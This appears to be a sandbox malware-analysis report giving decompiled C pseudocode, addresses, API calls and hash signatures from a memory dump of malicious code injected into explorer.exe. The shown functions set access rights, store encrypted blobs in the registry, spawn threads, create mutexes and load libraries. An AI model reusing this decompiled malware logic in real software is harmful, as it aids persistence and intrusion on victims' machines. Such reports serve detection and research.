                            0x0008be44
                            0x0008be44
                            0x0008be47
                            0x0008be4f
                            0x00000000
                            0x0008be4f
                            0x0008bdbe

                            APIs
                            • SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 0008BDF7
                            • LocalAlloc.KERNEL32(00000040,00000014), ref: 0008BE02
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocEntriesLocal
                            • String ID:
                            • API String ID: 2146116654-0
                            • Opcode ID: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                            • Instruction ID: 3aa66279fdb8b3e8acfe9a35cde7f6eb8d9a09b5f03ef1515584b77c0f26ffcf
                            • Opcode Fuzzy Hash: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                            • Instruction Fuzzy Hash: C3512A71A00248EFEB64DF99D888ADEBBF8FF44704F15806AF604AB260D7749D45CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A0AB, Relevance: 3.1, APIs: 2, Instructions: 146registryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E0008A0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
				char* _v12;
				char _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char* _v32;
				char _v52;
				char _v64;
				char _v328;
				char _v2832;
				signed int _t48;
				signed int _t49;
				char* _t54;
				long _t73;
				long _t80;
				long _t83;
				intOrPtr _t84;
				void* _t88;
				char* _t89;
				intOrPtr _t90;
				void* _t103;
				void* _t104;
				char* _t106;
				intOrPtr _t107;
				char _t108;

				_t48 = __ecx;
				_t89 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t115 = __edx;
					if(__edx == 0) {
						goto L13;
					}
					_t107 =  *((intOrPtr*)(__ecx + 0x108));
					_push(_t107);
					_t103 = 4;
					_v12 = __edx;
					_v28 = E0008D400( &_v12, _t103);
					_t93 = _t107 + __edx;
					E00092301(_t107 + __edx,  &_v2832);
					_t54 = E0009242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
					_t108 = _a8;
					_v12 = _t54;
					_v20 = _t54 + 6 + _t108;
					_t106 = E00088604(_t54 + 6 + _t108);
					_v32 = _t106;
					if(_t106 != 0) {
						 *_t106 = _a12;
						_t16 =  &(_t106[6]); // 0x6
						_t106[1] = 1;
						_t106[2] = _t108;
						E000886E1(_t16, _a4, _t108);
						_t21 = _t108 + 6; // 0x6
						E000922D3( &_v2832, _t21 + _t106, _v12);
						_v16 = _t89;
						_t90 = _v24;
						_v12 =  *((intOrPtr*)(_t90 + 0x108));
						_push( &_v52);
						_t104 = 8;
						E0008F490( &_v16, _t104);
						E0008EAC1( &_v16,  &_v52, 0x14,  &_v328);
						E0008EB2E(_t106, _v20,  &_v328);
						_t73 = E00089B0E(_t90);
						_v12 = _t73;
						__eflags = _t73;
						if(_t73 != 0) {
							E000897A0(_v28,  &_v64, 0x10);
							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
							__eflags = _t80;
							if(_t80 == 0) {
								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
								__eflags = _t83;
								if(_t83 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								_t84 =  *0x9e68c; // 0x286fab8
								 *((intOrPtr*)(_t84 + 0x1c))(_a4);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E0008861A( &_v12, 0xffffffff);
						}
						E0008861A( &_v32, 0);
						return 0;
					}
					_t88 = 0xfffffffe;
					return _t88;
				}
			}




























                            0x0008a0b8
                            0x0008a0bd
                            0x0008a0bf
                            0x0008a0c2
                            0x0008a231
                            0x0008a231
                            0x0008a231
                            0x00000000
                            0x0008a0d2
                            0x0008a0d2
                            0x0008a0d4
                            0x00000000
                            0x00000000
                            0x0008a0da
                            0x0008a0e3
                            0x0008a0e6
                            0x0008a0e7
                            0x0008a0ef
                            0x0008a0f2
                            0x0008a0fd
                            0x0008a10d
                            0x0008a112
                            0x0008a115
                            0x0008a11e
                            0x0008a126
                            0x0008a12b
                            0x0008a130
                            0x0008a13d
                            0x0008a13f
                            0x0008a146
                            0x0008a14b
                            0x0008a14e
                            0x0008a156
                            0x0008a163
                            0x0008a168
                            0x0008a16e
                            0x0008a177
                            0x0008a17d
                            0x0008a180
                            0x0008a181
                            0x0008a193
                            0x0008a1a3
                            0x0008a1af
                            0x0008a1b4
                            0x0008a1b7
                            0x0008a1b9
                            0x0008a1c3
                            0x0008a1de
                            0x0008a1e1
                            0x0008a1e3
                            0x0008a1fe
                            0x0008a201
                            0x0008a203
                            0x0008a205
                            0x0008a207
                            0x0008a207
                            0x0008a208
                            0x0008a210
                            0x0008a1e5
                            0x0008a1e5
                            0x0008a1e7
                            0x0008a1e7
                            0x0008a219
                            0x0008a21f
                            0x0008a226
                            0x00000000
                            0x0008a22d
                            0x0008a134
                            0x00000000
                            0x0008a134

                            APIs
                              • Part of subcall function 0009242D: _ftol2_sse.MSVCRT ref: 0009248E
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 0008A1DE
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapOpen_ftol2_sse
                            • String ID:
                            • API String ID: 3756893521-0
                            • Opcode ID: ceb7e804541080db6b3cb85923b363ab7d14183699dbb7a162a48657ba5fffad
                            • Instruction ID: 678beb8ec0cb8c060cb6281312f41271aa2b36fb26bfbf1ebb42210e6552e48b
                            • Opcode Fuzzy Hash: ceb7e804541080db6b3cb85923b363ab7d14183699dbb7a162a48657ba5fffad
                            • Instruction Fuzzy Hash: 7551B372A00209BBDF20EF94DC41FDEBBB8BF05320F108166F555A7291EB749644CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000898EE, Relevance: 3.1, APIs: 2, Instructions: 133COMMON
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E000898EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				struct _SECURITY_ATTRIBUTES* _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t73;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t98;
				int _t106;
				intOrPtr _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_v12 = __ecx;
				_t77 =  *0x9e76c; // 0x1d0
				_t73 = 0;
				if(E0008A4BF(_t77, 0x7530) >= 0) {
					_t45 =  *0x9e770; // 0x2854028
					_t112 = 0;
					_t106 = 0;
					do {
						_t78 =  *((intOrPtr*)(_t106 + _t45));
						if(_t78 == 0) {
							L6:
							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
								_t113 = _t112 << 5;
								if(_v8 == _t73) {
									 *(_t113 + _t45 + 0x10) = _t73;
									_t46 =  *0x9e770; // 0x2854028
									 *(_t113 + _t46 + 0xc) = _t73;
									L14:
									_t79 =  *0x9e770; // 0x2854028
									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
									_t48 =  *0x9e770; // 0x2854028
									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
									_t49 = E0008A471(0, 1);
									_t82 =  *0x9e770; // 0x2854028
									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
									_t83 =  *0x9e770; // 0x2854028
									_t30 = _t83 + _t113 + 4; // 0x285402c
									_t52 = CreateThread(_t73, _t73, E000898A6, _t83 + _t113, _t73, _t30);
									_t53 =  *0x9e770; // 0x2854028
									 *(_t113 + _t53) = _t52;
									_t54 =  *0x9e770; // 0x2854028
									_t86 =  *(_t113 + _t54);
									if(_t86 != 0) {
										SetThreadPriority(_t86, 0xffffffff);
										_t87 =  *0x9e770; // 0x2854028
										 *0x9e774 =  *0x9e774 + 1;
										E0008A4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
										_t74 =  *0x9e770; // 0x2854028
										_t73 = _t74 + _t113;
									} else {
										_t59 =  *0x9e684; // 0x286f8f0
										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
										_t61 =  *0x9e770; // 0x2854028
										_t37 = _t61 + 0xc; // 0x2854034
										_t91 = _t37 + _t113;
										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
											E0008861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
											_t61 =  *0x9e770; // 0x2854028
										}
										_t92 = 8;
										memset(_t113 + _t61, 0, _t92 << 2);
									}
									L19:
									_t89 =  *0x9e76c; // 0x1d0
									E0008A4DB(_t89);
									_t58 = _t73;
									L20:
									return _t58;
								}
								_t110 = _a4;
								_t65 = E00088604(_t110);
								_t97 =  *0x9e770; // 0x2854028
								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
								_t66 =  *0x9e770; // 0x2854028
								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
									goto L19;
								}
								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
								_t67 =  *0x9e770; // 0x2854028
								E000886E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
								_t115 = _t115 + 0xc;
								goto L14;
							}
							goto L7;
						}
						_t69 =  *0x9e684; // 0x286f8f0
						_push(_t73);
						_push(_t78);
						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
							_t45 =  *0x9e770; // 0x2854028
							goto L7;
						}
						_t98 =  *0x9e770; // 0x2854028
						E0008984A(_t106 + _t98, 0);
						_t45 =  *0x9e770; // 0x2854028
						goto L6;
						L7:
						_t106 = _t106 + 0x20;
						_t112 = _t112 + 1;
					} while (_t106 < 0x1000);
					goto L19;
				}
				_t58 = 0;
				goto L20;
			}





































                            0x000898f1
                            0x000898f2
                            0x000898f3
                            0x000898fb
                            0x000898fe
                            0x00089905
                            0x0008990e
                            0x00089917
                            0x0008991e
                            0x00089920
                            0x00089922
                            0x00089922
                            0x00089927
                            0x0008994f
                            0x00089952
                            0x0008996c
                            0x00089972
                            0x000899b2
                            0x000899b6
                            0x000899bb
                            0x000899bf
                            0x000899bf
                            0x000899cb
                            0x000899cf
                            0x000899d7
                            0x000899dd
                            0x000899e2
                            0x000899e8
                            0x000899ec
                            0x000899f4
                            0x00089a06
                            0x00089a0b
                            0x00089a10
                            0x00089a13
                            0x00089a18
                            0x00089a1d
                            0x00089a59
                            0x00089a5f
                            0x00089a65
                            0x00089a6f
                            0x00089a74
                            0x00089a7a
                            0x00089a1f
                            0x00089a23
                            0x00089a28
                            0x00089a2b
                            0x00089a30
                            0x00089a33
                            0x00089a37
                            0x00089a3e
                            0x00089a43
                            0x00089a49
                            0x00089a51
                            0x00089a52
                            0x00089a52
                            0x00089a7c
                            0x00089a7c
                            0x00089a82
                            0x00089a88
                            0x00089a8b
                            0x00089a8d
                            0x00089a8d
                            0x00089974
                            0x00089978
                            0x0008997e
                            0x00089984
                            0x00089988
                            0x00089991
                            0x00000000
                            0x00000000
                            0x00089997
                            0x0008999b
                            0x000899a8
                            0x000899ad
                            0x00000000
                            0x000899ad
                            0x00000000
                            0x00089952
                            0x00089929
                            0x0008992e
                            0x0008992f
                            0x00089938
                            0x00089965
                            0x00000000
                            0x00089965
                            0x0008993a
                            0x00089945
                            0x0008994a
                            0x00000000
                            0x00089954
                            0x00089954
                            0x00089957
                            0x00089958
                            0x00000000
                            0x00089960
                            0x00089910
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 13136b35abf7dcd7586c6f32f264bee96a55df3916c08bc9964099082c366c6c
                            • Instruction ID: 2208b45a903d8e4e3ebf4af7583ef236fbc94e4c18dfd99628fde9c82a46c99b
                            • Opcode Fuzzy Hash: 13136b35abf7dcd7586c6f32f264bee96a55df3916c08bc9964099082c366c6c
                            • Instruction Fuzzy Hash: 4F515171614640DFEB69EFA8DC84876F7F9FB48314358892EE48687361D735AC02CB42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A6A9, Relevance: 3.1, APIs: 2, Instructions: 90fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 26%
                            			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E0008A63B(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0x9e684; // 0x286f8f0
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0x9e684; // 0x286f8f0
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E0008861A( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t60 = E00088604(_t4);
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							CloseHandle(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}













                            0x0008a6ac
                            0x0008a6ad
                            0x0008a6ae
                            0x0008a6b2
                            0x0008a6b4
                            0x0008a6b9
                            0x0008a6c9
                            0x0008a6cd
                            0x0008a757
                            0x0008a757
                            0x0008a759
                            0x0008a75b
                            0x0008a75d
                            0x0008a75d
                            0x0008a6d3
                            0x0008a6e1
                            0x0008a6e5
                            0x0008a73d
                            0x0008a73d
                            0x0008a743
                            0x0008a748
                            0x0008a750
                            0x0008a756
                            0x00000000
                            0x0008a748
                            0x0008a6e7
                            0x0008a6f0
                            0x0008a6f2
                            0x0008a6f8
                            0x00000000
                            0x00000000
                            0x0008a6fc
                            0x0008a6ff
                            0x0008a700
                            0x0008a706
                            0x0008a707
                            0x0008a708
                            0x0008a72d
                            0x0008a70f
                            0x0008a761
                            0x00000000
                            0x00000000
                            0x0008a763
                            0x0008a766
                            0x0008a76c
                            0x0008a76e
                            0x0008a76e
                            0x0008a776
                            0x0008a779
                            0x00000000
                            0x0008a779
                            0x0008a717
                            0x0008a71a
                            0x0008a71e
                            0x0008a720
                            0x0008a723
                            0x0008a728
                            0x0008a72c
                            0x0008a72c
                            0x00000000
                            0x0008a72d
                            0x0008a6bb
                            0x00000000

                            APIs
                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
                            • CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,0286FD30,00000400), ref: 0008A776
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandleRead
                            • String ID:
                            • API String ID: 2331702139-0
                            • Opcode ID: 88356f6b106add4076ec0f83c2a296f690f09df244fe65e188c16454d9d3e760
                            • Instruction ID: 682a662acdfee72883915282426476a47a31b64306a9f0d0b2be5f1f474e3a22
                            • Opcode Fuzzy Hash: 88356f6b106add4076ec0f83c2a296f690f09df244fe65e188c16454d9d3e760
                            • Instruction Fuzzy Hash: DE218D76B04205AFEB50EF64CC84FAA77FCBB05744F10806AF946DB642E770D9409B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008153B, Relevance: 3.1, APIs: 2, Instructions: 69synchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 76%
                            			E0008153B(void* __ecx, void* __edx) {
				void* _v8;
				void* _t3;
				signed int _t4;
				intOrPtr _t7;
				signed int _t9;
				intOrPtr _t10;
				void* _t24;

				_push(__ecx);
				_t3 = CreateMutexA(0, 0, 0);
				 *0x9e6f4 = _t3;
				if(_t3 == 0) {
					L11:
					_t4 = _t3 | 0xffffffff;
					__eflags = _t4;
				} else {
					_t3 = CreateMutexA(0, 0, 0);
					 *0x9e6dc = _t3;
					if(_t3 == 0) {
						goto L11;
					} else {
						_t3 = E00081080(0x4ac);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L11;
						} else {
							 *0x9e6e8 = E000891A6(_t3, 0);
							E000885C2( &_v8);
							_t7 = E00088604(0x100);
							 *0x9e6f0 = _t7;
							if(_t7 != 0) {
								 *0x9e6fc = 0;
								_t9 = E00088604(0x401);
								 *0x9e6d4 = _t9;
								__eflags = _t9;
								if(_t9 != 0) {
									__eflags =  *0x9e6c0; // 0x0
									if(__eflags == 0) {
										E000915B6(0x88202, 0x8820b);
									}
									_push(0x61e);
									_t24 = 8;
									_t10 = E0008E1BC(0x9bd28, _t24); // executed
									 *0x9e6a0 = _t10;
									_t4 = 0;
								} else {
									_push(0xfffffffc);
									goto L5;
								}
							} else {
								_push(0xfffffffe);
								L5:
								_pop(_t4);
							}
						}
					}
				}
				return _t4;
			}










                            0x0008153e
                            0x00081545
                            0x0008154b
                            0x00081552
                            0x00081607
                            0x00081607
                            0x00081607
                            0x00081558
                            0x0008155b
                            0x00081561
                            0x00081568
                            0x00000000
                            0x0008156e
                            0x00081573
                            0x00081578
                            0x0008157d
                            0x00000000
                            0x00081583
                            0x0008158f
                            0x00081594
                            0x0008159e
                            0x000815a3
                            0x000815ab
                            0x000815b9
                            0x000815bf
                            0x000815c4
                            0x000815ca
                            0x000815cc
                            0x000815d2
                            0x000815d8
                            0x000815e4
                            0x000815ea
                            0x000815eb
                            0x000815f2
                            0x000815f8
                            0x000815fd
                            0x00081602
                            0x000815ce
                            0x000815ce
                            0x00000000
                            0x000815ce
                            0x000815ad
                            0x000815ad
                            0x000815af
                            0x000815af
                            0x000815af
                            0x000815ab
                            0x0008157d
                            0x00081568
                            0x0008160c

                            APIs
                            • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 00081545
                            • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 0008155B
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateMutex$AllocateHeap
                            • String ID:
                            • API String ID: 704353917-0
                            • Opcode ID: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
                            • Instruction ID: ebe42fdb1850e6894ca3f7a01c19cd8768a376f5bc184f032faea728c04dbff3
                            • Opcode Fuzzy Hash: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
                            • Instruction Fuzzy Hash: A111C871604A82AAFB60FB76EC059AA36E8FFD17B0760462BE5D1D51D1FF74C8018710
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00085974, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54COMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E00085974(void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v52;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t27;
				void* _t42;

				_t42 = __edx;
				_v8 = 0;
				E0008A86D( &_v52, __ecx, __eflags);
				_t16 =  *0x9e688; // 0xb0000
				if( *((intOrPtr*)(_t16 + 0x644)) > 0) {
					L1:
					_t27 =  *0x9e684; // 0x286f8f0
					 *((intOrPtr*)(_t27 + 0xb4))(0x32);
					goto L1;
				}
				_push(0);
				_push( &_v52);
				_push("\\");
				_v12 = E00089292("Global");
				_t19 = E0008590C(_t18, _t42,  &_v8); // executed
				__eflags = _t19 - 1;
				if(_t19 == 1) {
					CloseHandle(_v8);
					_v8 = 0;
					E0008590C( &_v52, _t42,  &_v8); // executed
				}
				E0008861A( &_v12, 0xffffffff);
				return _v8;
			}










                            0x0008597c
                            0x00085982
                            0x00085988
                            0x0008598d
                            0x00085998
                            0x0008599a
                            0x0008599a
                            0x000859a1
                            0x00000000
                            0x000859a1
                            0x000859a9
                            0x000859ad
                            0x000859ae
                            0x000859c0
                            0x000859c8
                            0x000859d0
                            0x000859d3
                            0x000859dd
                            0x000859e3
                            0x000859ec
                            0x000859f1
                            0x000859f8
                            0x00085a05

                            APIs
                            • CloseHandle.KERNELBASE(00085DD4,?,?,?,?,00000002), ref: 000859DD
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle
                            • String ID: Global
                            • API String ID: 2962429428-4020866741
                            • Opcode ID: bf963d4d9802a3cf92ade42826878ca464ff62fd084caeceb66e864cea665a67
                            • Instruction ID: ad9e46771b38e1f6345cb022d52bc1c5a3711b7f461b92f87be1531e78fdffdd
                            • Opcode Fuzzy Hash: bf963d4d9802a3cf92ade42826878ca464ff62fd084caeceb66e864cea665a67
                            • Instruction Fuzzy Hash: 42117C72A04118EBDB00FB98ED45CDDB7F8FB90321F20006AF485E7292EA309E00CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008E1BC, Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 47%
                            			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E000895C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0008E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E000885C2( &_v8);
				return _t25;
			}










                            0x0008e1bf
                            0x0008e1c2
                            0x0008e1c8
                            0x0008e1ca
                            0x0008e1cf
                            0x0008e1d1
                            0x0008e1db
                            0x0008e1dc
                            0x0008e1eb
                            0x0008e1de
                            0x0008e1de
                            0x0008e1de
                            0x0008e1ef
                            0x0008e1f6
                            0x0008e1fc
                            0x0008e1fc
                            0x0008e201
                            0x0008e20c

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
                            • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 4133054770-0
                            • Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                            • Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
                            • Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                            • Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00082C8F, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                            Download Yara Rule
                            C-Code - Quality: 65%
                            			E00082C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				WCHAR* _v8;
				char _v12;
				char _v44;
				char _v564;
				char _v1084;
				void* __esi;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t25;
				int _t27;
				char _t32;
				char _t38;
				intOrPtr _t39;
				void* _t40;
				WCHAR* _t41;
				void* _t54;
				char* _t60;
				char* _t63;
				void* _t70;
				WCHAR* _t71;
				intOrPtr* _t73;

				_t70 = __ecx;
				_push(__ecx);
				E0008B700(__edx,  &_v44, __eflags, __fp0);
				_t52 = _t70;
				if(E0008BB8D(_t70) == 0) {
					_t23 = E00082BA4( &_v1084, _t70, 0x104); // executed
					_pop(_t54);
					__eflags = _t23;
					if(__eflags == 0) {
						_t71 = E00082C64( &_v1084, __eflags);
					} else {
						E0008B012(_t54,  &_v564); // executed
						_t32 = E0008109A(_t54, 0x375);
						_push(0);
						_v12 = _t32;
						_push( &_v44);
						_t60 = "\\";
						_push(_t60);
						_push(_t32);
						_push(_t60);
						_push( &_v564);
						_push(_t60);
						_t71 = E000892E5( &_v1084);
						E000885D5( &_v12);
					}
				} else {
					_t38 = E0008109A(_t52, 0x4e0);
					 *_t73 = 0x104;
					_v12 = _t38;
					_t39 =  *0x9e684; // 0x286f8f0
					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
					_t78 = _t40;
					if(_t40 != 0) {
						_t41 = E0008109A( &_v564, 0x375);
						_push(0);
						_v8 = _t41;
						_push( &_v44);
						_t63 = "\\";
						_push(_t63);
						_push(_t41);
						_push(_t63);
						_t71 = E000892E5( &_v564);
						E000885D5( &_v8);
					} else {
						_t71 = E00082C64( &_v44, _t78);
					}
					E000885D5( &_v12);
				}
				_v8 = _t71;
				_t25 = E0008B269(_t71);
				if(_t25 == 0) {
					_t27 = CreateDirectoryW(_t71, _t25); // executed
					if(_t27 == 0 || E0008B269(_t71) == 0) {
						E0008861A( &_v8, 0xfffffffe);
						_t71 = _v8;
					}
				}
				return _t71;
			}























                            0x00082c9e
                            0x00082ca0
                            0x00082ca3
                            0x00082ca9
                            0x00082cb2
                            0x00082d36
                            0x00082d3b
                            0x00082d3c
                            0x00082d3e
                            0x00082d8f
                            0x00082d40
                            0x00082d46
                            0x00082d50
                            0x00082d55
                            0x00082d5a
                            0x00082d5d
                            0x00082d5e
                            0x00082d63
                            0x00082d64
                            0x00082d65
                            0x00082d6c
                            0x00082d6d
                            0x00082d7a
                            0x00082d80
                            0x00082d85
                            0x00082cb4
                            0x00082cb9
                            0x00082cbe
                            0x00082ccc
                            0x00082cd0
                            0x00082cd5
                            0x00082cdb
                            0x00082cdd
                            0x00082ced
                            0x00082cf2
                            0x00082cf7
                            0x00082cfa
                            0x00082cfb
                            0x00082d00
                            0x00082d01
                            0x00082d02
                            0x00082d0f
                            0x00082d15
                            0x00082cdf
                            0x00082ce4
                            0x00082ce4
                            0x00082d21
                            0x00082d26
                            0x00082d93
                            0x00082d96
                            0x00082d9d
                            0x00082da1
                            0x00082da9
                            0x00082dbc
                            0x00082dc1
                            0x00082dc5
                            0x00082da9
                            0x00082dca

                            APIs
                            • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00082DA1
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateDirectory
                            • String ID:
                            • API String ID: 4241100979-0
